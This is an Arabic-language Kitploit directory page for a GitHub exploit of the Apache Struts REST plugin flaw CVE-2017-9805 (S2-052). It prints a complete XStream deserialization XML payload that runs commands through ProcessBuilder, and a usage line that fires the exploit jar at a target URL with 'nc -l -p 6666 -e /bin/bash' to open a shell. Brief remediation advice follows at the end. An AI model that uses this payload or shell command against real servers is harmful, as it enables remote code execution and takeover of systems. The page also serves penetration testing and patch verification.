Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
S2-052 — CVE-2017-9805 - استغلال | Kitploit
أدوات/GitHubGitHub/beyondcy/s2-052
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubbeyondcy/s2-052

S2-052

CVE-2017-9805 - استغلال

عرض المستودع
1منذ 8 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2017-9805 (S2-052) استغلال شل عكسي

الإصدارات المتأثرة

root@kitploit:~
Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12

Poc

root@kitploit:~
Content-Type: application/xml

<map>
<entry>
<jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>calc</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>

ويندوز <command><string>calc</string></command>

ماك <command><string>/Applications/Calculator.app/Contents/MacOS/Calculator</string></command>

تفاصيل إعادة إنتاج الثغرة

https://secfree.com/article-333.html

تثبيت Nc على CentOS 7

root@kitploit:~
rpm -ivh netcat-1.10-891.2.x86_64.rpm

الخيارات

root@kitploit:~
 [*] Apache Struts2 CVE-2017-9805 (S2-052) - Exploit
 [*] 0day Info:https://secfree.com/article-333.html
 [*] Use:        <targetUrl> <command>
 [*] Author:  www.secFree.com Team By Bearcat

الاستخدام

root@kitploit:~
java -jar CVE-2017-9805-Exploit.jar http://192.168.199.246:8080/struts2-rest-showcase/orders.xhtml "nc -l -p 6666 -e /bin/bash"

nc 192.168.199.246 6666

exploit

هذا الاستغلال يقوم فقط بعكس الشل (reverse shell)، لعرض نتائج تنفيذ الأوامر، يرجى زيارة: https://github.com/luc10/struts-rce-cve-2017-9805

خطة الإصلاح

  1. يُوصى بالترقية إلى الإصدار 2.5.13 في أقرب وقت ممكن.

  2. احذف ملحق Struts REST عند عدم الاستخدام، أو اقتصر على الصفحات العادية وJSONs في الخادم:

root@kitploit:~
<constant name=”struts.action.extension” value=”xhtml,,json” />
  1. قيد أنواع الامتدادات من جانب الخادم، واحذف دعم XML.
تنزيل الأداة